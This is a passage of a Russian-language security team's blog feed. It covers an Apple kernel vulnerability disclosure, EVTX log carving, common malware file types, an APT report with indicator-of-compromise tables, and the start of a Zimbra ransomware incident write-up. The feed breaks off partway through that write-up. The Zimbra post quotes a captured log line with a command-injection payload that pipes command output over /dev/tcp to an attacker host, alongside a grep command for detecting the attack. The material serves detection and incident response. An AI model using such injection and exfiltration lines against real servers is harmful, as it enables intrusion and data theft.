										<content:encoded><![CDATA[<figure class="wp-block-video"><video controls preload="metadata" src="/wp-content/uploads/2026/09/903.mp4"></video></figure>
<p><strong>Мы помогли Apple устранить уязвимость в ядре ее операционных систем</strong></p>
<p>Эксперт PT ESC<strong> Михаил Ложников</strong> обнаружил недостаток, который мог вызвать внезапное завершение работы системы (сбой ядра) или повреждение памяти ядра (kernel memory corruption) в продукции компании Apple.</p>
<p>⚠️ Уязвимость <a href="https://dbugs.ptsecurity.com/vulnerability/PT-2026-76847?fts%5Bvalue%5D=CVE-2026-65330" rel="noopener" target="_blank">PT-2026-76847</a> (<a href="https://nvd.nist.gov/vuln/detail/cve-2026-65330" rel="noopener" target="_blank">CVE-2026-65330</a>) получила средний уровень критичности — 6.5 по шкале CVSS 3.x.</p>
<p><strong>Делимся подробностями</strong></p>
<p>• Ошибка была обнаружена в BSD-подсистеме сетевого стека XNU (ядра macOS, iOS) в компоненте NECP (Network Extension Control Policy), который управляет правами доступа программ и приложений к сетевым интерфейсам.</p>
<p>• Для взаимодействия с NECP требуется процесс с привилегированными правами, подписанный цифровой подписью (platform-signed).</p>
<p>• При закрытии NECP-сессии ядро корректно освобождает domain-фильтры, но domain-trie (префиксное дерево доменов) остается в глобальном списке с указателем на уже освобожденную память сессии.</p>
<p>• При удалении trie по идентификатору (ID) ядро не проверяет владельца.</p>
<p>• Любая другая сессия может удалить чужое префиксное дерево, вследствие чего может произойти ошибка и ядро вызовет панику.</p>
<p><strong>🍏</strong><strong> Скорее обновляйте ваши устройства</strong></p>
<p>Apple уже выпустила исправление безопасности в <strong>iOS/iPadOS 26.6.1, macOS 26.6.2, tvOS 27, watchOS 27</strong> и <strong>visionOS 27</strong>.</p>
<p>Подробная информация об исправлениях опубликована на официальных страницах Apple: <a href="https://support.apple.com/en-us/148281" rel="noopener" target="_blank">macOS</a>, <a href="https://support.apple.com/en-bw/148282" rel="noopener" target="_blank">iOS и iPadOS</a>, <a href="https://support.apple.com/en-us/149036" rel="noopener" target="_blank">tvOS</a>, <a href="https://support.apple.com/en-us/149037" rel="noopener" target="_blank">watchOS</a> и <a href="https://support.apple.com/en-us/149038" rel="noopener" target="_blank">visionOS</a>.</p>
<p><span class="hashtag">#cve</span> <span class="hashtag">#ir</span> <span class="hashtag">#ios</span> <span class="hashtag">#macos</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		<enclosure url="/wp-content/uploads/2026/09/903.mp4" length="934327" type="video/mp4" />

			</item>
		<item>
		<title>Восстановление EVTX-записей: методы карвинга</title>
		<link>/recovering-evtx-records-carving-methods/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Wed, 23 Sep 2026 14:49:54 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[tips]]></category>
		<guid isPermaLink="false">/%d0%b2%d0%be%d1%81%d1%81%d1%82%d0%b0%d0%bd%d0%be%d0%b2%d0%bb%d0%b5%d0%bd%d0%b8%d0%b5-evtx-%d0%b7%d0%b0%d0%bf%d0%b8%d1%81%d0%b5%d0%b9-%d0%bc%d0%b5%d1%82%d0%be%d0%b4%d1%8b-%d0%ba%d0%b0%d1%80%d0%b2/</guid>

					<description><![CDATA[Восстановление EVTX-записей: методы карвинга 🧩 При расследовании инцидентов, когда злоумышленники шифруют образы виртуальных машин, нередко возникает ситуация, при которой файловая система повреждается настолько, что штатное монтирование становится невозможным. Восстановить ее вручную теоретически…]]></description>
										<content:encoded><![CDATA[<p><strong>Восстановление EVTX-записей: методы карвинга</strong> 🧩</p>
<p>При расследовании инцидентов, когда злоумышленники шифруют образы виртуальных машин, нередко возникает ситуация, при которой файловая система повреждается настолько, что штатное монтирование становится невозможным. </p>
<p>Восстановить ее вручную теоретически можно, но это отнимает много времени и сопровождается потерями данных. В таких случаях применяется карвинг — побайтовый поиск сигнатур непосредственно в сыром образе, в обход файловой системы.</p>
<p>❗️ <strong>Команда PT ESC IR уделяет приоритетное внимание автоматизации разбора артефактов для последующего обнаружения вредоносной активности</strong> — это ускоряет восстановление картины инцидента. </p>
<p>Наш пайплайн преимущественно реализован на Go, поэтому мы разработали собственную библиотеку на том же языке. Она разбирает готовые EVTX-файлы даже при несовпадении контрольных сумм или повреждении файла, а также выполняет карвинг событий из побитовых копий, дампов памяти и образов виртуальных дисков.</p>
<p>О том, что поддается восстановлению и почему одни подходы дают полную структуру записи, а другие — лишь отдельные поля, <a href="https://habr.com/ru/companies/pt/articles/1084600/" rel="noopener" target="_blank">читайте в нашем материале на Хабре</a> 🫲</p>
<p><span class="hashtag">#ir</span> <span class="hashtag">#dfir</span> <span class="hashtag">#tip</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>.exe .docm .xlsm</title>
		<link>/exe-docm-xlsm/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Fri, 18 Sep 2026 12:12:34 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[malware]]></category>
		<guid isPermaLink="false">/exe-docm-xlsm/</guid>

					<description><![CDATA[.exe .docm .xlsm Вредоносные файлы с этими расширениями чаще всего встречаются в сетевом трафике компаний. Давайте базово разберемся, почему. 🖥 .exe — классическое расширение исполняемых файлов в Windows: двойной клик — и…]]></description>
										<content:encoded><![CDATA[<p><strong>.exe .docm .xlsm</strong></p>
<p>Вредоносные файлы с этими расширениями чаще всего встречаются в сетевом трафике компаний. Давайте базово разберемся, почему.</p>
<p>🖥 <strong>.exe — классическое расширение исполняемых файлов в Windows:</strong> двойной клик — и у вас запускается Fortnite (не осуждаем), браузер, ваш любимый мессенджер, установщик или любая другая программа. А может запуститься и Trojan или какой-нибудь другой вредонос.</p>
<p>Чаще всего вы даже не видите, что у файла именно такое расширение: по умолчанию в Windows включена функция «Скрывать расширения для зарегистрированных типов файлов», из-за чего видно только первую часть имени. И этим пользуются злоумышленники.</p>
<p>Например, они маскируют файл под что-нибудь безобидное: вместо <code>zarplaty_sep_2026.pdf.exe</code> вы увидите просто <code>zarplaty_sep_2026.pdf</code>. Подозрений не вызывает, а интерес пробуждает. Клац-клац — и бамц.</p>
<p>В общем, для самозащиты рекомендуем отключить эту функцию. Делается просто, зато вы всегда будете знать, на что именно кликаете.</p>
<p>📄 <strong>.docm и .xlsm — а это знакомые всем офисным работягам расширения документов Microsoft Office.</strong> Их часто перекидывают по электронной почте, чатам и флешкам, так что обычно они не вызывают подозрений.</p>
<p>Только что-то тут с последними буквами расширений не так — скажете вы, и будете правы. Вместо <code>x</code> в конце здесь стоит <code>m</code>, а это означает, что такие документы поддерживают макросы — небольшие программы на специальном языке VBA, которые могут выполнять действия внутри документа. Также могут попадаться расширения <code>.dotm</code> и <code>.xltm</code> — это шаблоны документов с поддержкой макросов.</p>
<p>И так же, как с <code>.exe</code>, эти расширения по умолчанию скрыты в наименовании файлов в Windows, поэтому вы просто видите иконку документа и его название.</p>
<p>Макросы — полезная штука, которая помогает автоматизировать рутинные действия в документах (с их помощью энтузиасты даже умудрились запустить DOOM прямо в Word). </p>
<p>Но ими пользуются и злоумышленники: вы открываете вроде бы обычный файл, разрешаете макросы — и на вашем компьютере выполняются заложенные в них команды. Например, они могут запустить системную команду, которая загрузит и запустит другой вредонос.</p>
<p><strong>Так вот, к чему мы это решили объяснить</strong></p>
<p>1️⃣ Внимательно следите за тем, что именно вы запускаете и какие разрешения даете.</p>
<p>2️⃣ Наши эксперты с помощью песочницы PT Sandbox проанализировали вредоносную активность, выявленную PT NAD в сетевом трафике организаций с октября 2025 года по июль 2026 года. И как раз 29% опасных файлов оказались с расширением <code>.exe,</code> а 26% — с расширениями Microsoft Office.</p>
<p>3️⃣ Как вы понимаете, эти файлы — только верхушка айсберга из вредоносов. Ниже в сетях были обнаружены и потенциально опасные инструменты, которые выглядят легитимно, различные вариации архивов и более интересные находки.</p>
<p>О них — в полной версии <a href="https://ptsecurity.com/threats-in-network-traffic/?utm_source=tg_esc&#038;utm_medium=network&#038;utm_campaign=18_09" rel="noopener" target="_blank">исследования на нашем сайте</a>.</p>
<p><span class="hashtag">#malware</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Операция Chewbacca</title>
		<link>/operation-chewbacca/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Tue, 15 Sep 2026 11:43:48 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[APT]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[TI]]></category>
		<guid isPermaLink="false">/%d0%be%d0%bf%d0%b5%d1%80%d0%b0%d1%86%d0%b8%d1%8f-chewbacca/</guid>

					<description><![CDATA[В конце июня команда PT ESC в ходе расследования инцидентов обнаружила новую группу, нацеленную как минимум на нефтегазовые компании и финансовый сектор. В ходе атак злоумышленники преследуют деструктивные цели, при этом достаточно…]]></description>
										<content:encoded><![CDATA[<p>В конце июня команда PT ESC в ходе расследования инцидентов обнаружила новую группу, нацеленную как минимум на нефтегазовые компании и финансовый сектор.</p>
<p>В ходе атак злоумышленники преследуют деструктивные цели, при этом достаточно долго сохраняют присутствие в скомпрометированной инфраструктуре.</p>
<p>При перемещении в инфраструктуре используются преимущественно <code>WinRM</code> (как правило, в сочетании с <a href="https://github.com/WinRb/winrm-fs/" rel="noopener" target="_blank">WinRb</a>) и <code>SSH</code>.</p>
<p>Для закрепления в инфраструктуре используются в основном серверные машины с большим аптаймом (<code>Windows\Linux</code>), закрепление осуществляется посредством сервисов в обоих случаях. В качестве полезных нагрузок используется широкий набор инструментов:</p>
<ul>
<li>Агенты для фреймворка <a href="https://github.com/Ne0nd0g/merlin" rel="noopener" target="_blank">merlin</a>.</li>
<li>Агент на базе <a href="https://github.com/NHAS/reverse_ssh" rel="noopener" target="_blank">reverse_ssh</a>.</li>
<li>Утилита <code>GoSocks5Proxy</code> на базе <a href="https://github.com/things-go/go-socks5" rel="noopener" target="_blank">go-socks5</a>.</li>
<li><code>ReverseProxy</code> — собственная утилита на Rust.</li>
<li>Бэкдор <code>GoRinet</code>. Использует шифрование конфига с ключом, формируемым на базе физического адреса сетевого адаптера.</li>
</ul>
<p>🐻 Для совершения деструктивных действий используется разнообразное ПО, в том числе по ряду признаков разработанное с использованием ИИ.</p>
<ul>
<li>Вайпер <code>T-Riper</code> для сетевых устройств производства <code>Cisco</code>/<code>Huawei</code> — удаление образов, сброс конфигурации устройства, ребут. Используются в сочетании с bash-скриптами для запуска по удаленным целям.</li>
<li>Кастомный вайпер для удаленного удаления данных <code>QNAP</code>.</li>
<li>Для шифрования данных на машинах под управлением ОС Windows используется комплекс ВПО, состоящий из оркестратора (с возможностью отправки отчета о прогрессе шифрования на удаленный C2). Порождение вайперов осуществляется многопоточно, причем отдельные исполняемые файлы создаются с добавлением «мусора» в оверлей для уклонения от обнаружения. Для автоматизированного распространения по сети используются файлы конфигов с указанием известных кредов ранее скомпрометированных УЗ и целевых подсетей.</li>
</ul>
<p>Также отмечено использование уязвимости <code>CVE-2026-31431</code> (<a href="https://github.com/tgies/copy-fail-c" rel="noopener" target="_blank">CopyFail</a>) для повышения привилегий, кастомного инструмента <code>CredsReseter</code> для сброса паролей УЗ Linux-подобных систем и Windows-скриптов для дампа кредов сторонних сервисов.</p>
<h2>Рекомендации:</h2>
<ul>
<li>Осуществить поиск и мониторинг индикаторов компрометации.</li>
<li>Провести сигнатурное сканирование.</li>
<li>Обновить ОС.</li>
</ul>
<h2>IoCs</h2>
<h4>Файловые индикаторы:</h4>
<table>
<tr>
<th>Name</th>
<th>MD5</th>
<th style="text-align:center">PT Fusion</th>
</tr>
<tr>
<td><code>acgid</code></td>
<td>9f7a688faf61d895a5c1d09084f16436</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/1f43e287-7d1a-45d8-a9ac-3c1bde73f353" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>cf</code></td>
<td>4c5b89504269b1d73ee5b6449559da4b</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/03639742-ad58-416f-9299-640c4c604a95" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>mnworker.exe</code></td>
<td>a6d00278363e4916c4bc6ff6f36dfe6f</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/cc009c93-fafa-4d3c-ac89-da2639210b40" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>NetConfigSvc.exe</code></td>
<td>56fd630da404d4d8c5afd17eb3506b41</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/b4c8d275-6f28-4f80-b248-8cddfeaa24ea" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>NetSvcHelper.exe</code></td>
<td>272625644208beab5daa79f676efab9a</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/e2c082a5-61e9-4506-bae9-9b2ec1c5d374" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>powerd</code></td>
<td>0def5f0f50482c887a8fa645e1347e8d</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/b57e6b4d-46a4-4e41-9c7a-2a58df95885f" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>ProcessMonitor.exe</code></td>
<td>85a9e9de754b99095644726faf6124f7</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/9b04a605-b1bf-41a9-8abb-f2268c467dc8" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>rinetd</code></td>
<td>fe323f8f6d84464b7a7f35d694c64851</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/ee4946ff-05be-4ffd-aa6c-9be8178d5467" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>rinetd</code></td>
<td>3874e14eda06779d777f182c39ac9dfe</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/def73865-f356-4ae8-909f-7f75cc7e8c3e" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>rinetd</code></td>
<td>1841b49525e0b3ca1a17556e6af775c7</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/ce98287b-092a-4208-867d-138857a40d1c" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-acpid</code></td>
<td>fc5a346c6bbec19a8463977e05fa14c2</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/caa88e55-b725-4623-9fc8-42412fceecfc" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-acpid</code></td>
<td>aa59ebd082118ab7c0a0fded580364da</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/4d018ec6-d77d-4ec4-a6f0-c9eeb909efa1" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-network-check</code></td>
<td>fe323f8f6d84464b7a7f35d694c64851</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/035f473d-b4f0-42b4-aad0-bd8609e3a4f1" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-rinetd</code></td>
<td>cc622348b636e654d68763447cdb4599</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/92ca1443-bbd9-4a57-b9a3-4ed19b9b7fe0" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-rinetd</code></td>
<td>517ae29a0048d9f21d0debe9476b94e5</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/8e32f73f-203a-408f-a66e-123e35003ed4" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-rinetd</code></td>
<td>40c5c2686fbc451386fc296994664fa2</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/833a1f01-ff28-4f92-80c2-f2fd0d7ef11e" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-udiskd</code></td>
<td>9dec74a38d9b6e668d616b2ec45159d5</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/2204c96f-eaeb-4e10-be93-a9117872e683" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-udiskd</code></td>
<td>0df3c7d1f30e984318cf3a3a98b9d4d2</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/6b597426-c69c-4393-a6c3-991ac50df2a9" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-udiskd</code></td>
<td>005b0b12b59930845fabc6f45c6ca725</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/5dc5700c-910a-41ad-afc8-cc33e701e188" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>test</code></td>
<td>85ba7a059f33bf40fb1386fd506b38a7</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/901a17cb-c300-4787-b80c-b90bf10592d7" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>udiskd</code></td>
<td>846ec88090311868d4e19658ef538077</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/5174b645-410d-4985-8aa7-4df97aa2d92c" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>update</code></td>
<td>4b6526c735279faf3f938e480c75471b</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/7ddb51b6-a903-4f7a-b3a7-642c6acaeef6" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>w.exe</code></td>
<td>0acd888653dba95628f3f403f3c03295</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/9117b8f8-c441-4466-8734-8f53b54a70a3" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>watchdog.exe</code></td>
<td>d363776b4adc2f3a513e0637eb7e957f</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/fe0b49cb-092d-43bb-a8f0-c8803b232afe" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>worker.exe</code></td>
<td>b6e904360c346665117dc97a096f8f96</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/dd44a163-c8d7-41da-bf01-492809af4fa6" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>zabbix_trapper</code></td>
<td>e54147cf021827f5eb9c19f41e561aa3</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/53d7cec5-7436-4132-a986-2b3f28b82959" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>zabbix_trapper</code></td>
<td>da1d0a016d5ee5190475fe0a8d69e139</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/f4ecd8b1-f8c5-4e88-a54a-4edd1f15faf2" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>zabbix-agent</code></td>
<td>e8cdefcbf2850a233fe6f13f22ec0efb</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/7b67039c-1f2c-419f-bc11-0ff9cf1a7a36" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>zabbix-trapper</code></td>
<td>860fd8008365a3e61a21328b0c431076</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/910a909d-6635-4704-89b1-270c3845fa35" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>zabbix-trapper</code></td>
<td>72fbfee7fabc9be88f263604addb1860</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/2595466a-78f9-4893-aa13-b55aec171e40" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>znfs.exe</code></td>
<td>31d4623ef6d7501c48ac2b3f47e3db16</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/6133992e-db1f-4625-891f-5b9bba613c05" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
</table>
<h4>Сетевые индикаторы</h4>
<table>
<tr>
<th>Адрес</th>
<th style="text-align:center">PT Fusion</th>
</tr>
<tr>
<td><code>adv-click-track.online</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/340ebc5f-fbcc-428f-8326-d376176cd547" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>adv-click-track.space</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/60779cde-8139-4c22-87ec-0644482691f8" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>cdn.debian-check.space</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/ec2009ca-6479-4091-91f7-67fd3ca5fc55" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>check.cert-update.online</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/9e305ae2-8a50-4efc-a78d-1f6afac461da" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>dpkg.debian-check.cloud</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/3a06f1b2-9e00-48cb-bc28-973d136abff8" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>scrt.vdyke.online</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/fcb62ad0-8212-4361-aacb-947a17ac0fff" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>status.cert-update.space</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/912be00e-8521-45aa-b958-d160b377986e" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>195.58.137.115</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/e5eb7d34-2df4-41d6-916e-5977ab2897d3" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>199.119.136.138</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/384d0b0e-ed0b-44b9-9f60-01dc4f3cd120" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>213.139.205.166</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/5d226d28-23ef-4dbf-9be6-1b83794ff478" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>216.146.26.31</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/af843866-7e01-4bbc-ac9e-e3eef7c8c431" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>45.145.171.112</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/6bee73b4-d2bf-4c5b-a915-29e52796e9f1" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>45.59.170.247</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/e36e99b7-0c72-48b2-9a2b-a1c54a93a1c6" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>91.221.191.228</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/126d3776-d330-4fcd-93b0-36774d1fdf02" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>94.124.160.113</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/afadbed6-2ee9-4b30-a114-9d8c8a97f88a" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>94.124.160.12</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/c20b7fda-0f31-4c6a-8477-7b770d62ee93" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
</table>
<p><span class="hashtag">#ir</span> <span class="hashtag">#dfir</span> <span class="hashtag">#ti</span> <span class="hashtag">#malware</span> <span class="hashtag">#apt</span> <span class="hashtag">#ioc</span> <br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Ваш сервер Zimbra под угрозой</title>
		<link>/your-zimbra-server-is-at-risk/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Thu, 10 Sep 2026 16:23:41 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[detect]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[malware]]></category>
		<guid isPermaLink="false">/%d0%b2%d0%b0%d1%88-%d1%81%d0%b5%d1%80%d0%b2%d0%b5%d1%80-zimbra-%d0%bf%d0%be%d0%b4-%d1%83%d0%b3%d1%80%d0%be%d0%b7%d0%be%d0%b9/</guid>

					<description><![CDATA[Недавно наша команда PT ESC IR столкнулась с новой атакой ransomware-группировок на почтовые серверы Zimbra с использованием уязвимости CVE-2026-73570 и шифровальщика TargetZimbra. По информации из открытых источников аналогичные атаки массово фиксируются на…]]></description>
										<content:encoded><![CDATA[<p>Недавно наша команда PT ESC IR столкнулась с новой атакой ransomware-группировок на почтовые серверы Zimbra с использованием уязвимости <a href="https://nvd.nist.gov/vuln/detail/cve-2026-73570" rel="noopener" target="_blank">CVE-2026-73570</a> и шифровальщика TargetZimbra. По информации из открытых источников аналогичные атаки массово фиксируются на серверах Zimbra с середины августа.</p>
<p><em>Дисклеймер: если вы используете неактуальную версию ПО Zimbra и не обнаружили на своем почтовом сервере приведенных ниже индикаторов компрометации конкретной кампании шифровальщика TargetZimbra, то это не значит, что ваш сервер гарантированно не скомпрометирован. Уязвимость CVE-2026-73570 может использоваться другими злоумышленниками, например, для установки майнеров, а также APT-группировками, нацеленными на компрометацию инфраструктуры всей организации.</p>
<p></em></p>
<blockquote>
<p>Уязвимость CVE-2026-73570 позволяет атакующему осуществлять внедрение и выполнение вредоносных команд на почтовом сервере Zimbra с правами пользователя zimbra без предварительной аутентификации в результате недостаточной санации ввода в компоненте SNMP.</p>
<p>Для успешной эксплуатации на почтовом сервере должна быть установлена версия ПО Zimbra Collaboration Suite ниже 10.1.20, а также установлен пакет zimbra-snmp и включены SNMP-уведомления. Уязвимость эксплуатируется в результате отправки специально сформированного SMTP-запроса через порты 25, 465 или 587.</p>
</blockquote>
<p>👀 <strong>Сценарий атаки:</p>
<p></strong>1. В результате эксплуатации уязвимости CVE-2026-73570 злоумышленники создают на почтовом сервере файл <code>/opt/zimbra/jetty_base/webapps/zimbra/public/version.txt</code> (или <code>versions.txt</code>), содержащий сведения об используемой на сервере версии ПО Zimbra. Созданный файл является для атакующего индикатором успешной эксплуатации уязвимости.</p>
<p>2. На следующем этапе злоумышленники загружают JSP-шеллы в директорию почтового сервера <code>/opt/zimbra/jetty_base/webapps/zimbra/public/</code>. Кроме того, зафиксировано внедрение на сервер хакерского инструмента Gsocket. Ранее мы уже писали подробную заметку о том, <a href="https://t.me/ptescalator/112" rel="noopener" target="_blank">как детектировать инструмент Gsocket</a>.</p>
<p>3. Далее злоумышленники загружают шифровальщик TargetZimbra, написанный на языке Go. После запуска указанный вредоносный модуль шифрует файлы с использованием алгоритма ChaCha20 в каталоге /opt/zimbra/ и его подкаталогах.</p>
<p>4. После шифрования файлов шифровальщик изменяет их расширение на <code>.elock</code>, а также создает в зашифрованных директориях файлы <code>!README_RECOVER.txt</code>, содержащие контактную информацию и сведения для выкупа расшифровки данных. По окончании работы вредоносный модуль TargetZimbra удаляет себя из системы.</p>
<p>📫 <strong>Как проверить ваш почтовый сервер Zimbra на предмет наличия признаков компрометации?</p>
<p></strong>1. В основном системном журнале почтовой службы<code> /var/log/maillog</code> записи, содержащие подстроку <code>changed from stopped to</code>, перед которой записана shell-команда или иная подозрительная нагрузка, являются признаком эксплуатации уязвимости CVE-2026-73570.</p>
<p>Для поиска вредоносных событий на вашем сервере может использоваться следующая команда: <code>grep &quot;changed from stopped to&quot; /var/log/maillog</p>
<p></code>Пример выполнения команды <code>id</code> и передачи ее вывода на С2-сервер злоумышленников:</p>
<pre><code>Aug 29 14:23:46 zimbra-server postfix/submission/smtpd[108829]: improper command pipelining after EHLO from unknown[[REDACTED_IP_1]]: : Service status change: h ;id&gt;/dev/tcp/[REDACTED_IP_2]/1337; changed from stopped to running\r\nQUIT\r\n  

- время эксплуатации уязвимости: 29 августа 2026 года в 14:23:46; 
- [REDACTED_IP_1]: С2 адрес злоумышленников; 
- id&gt;/dev/tcp/[REDACTED_IP_2]/1337: команда для выполнения на системе.</code></pre>
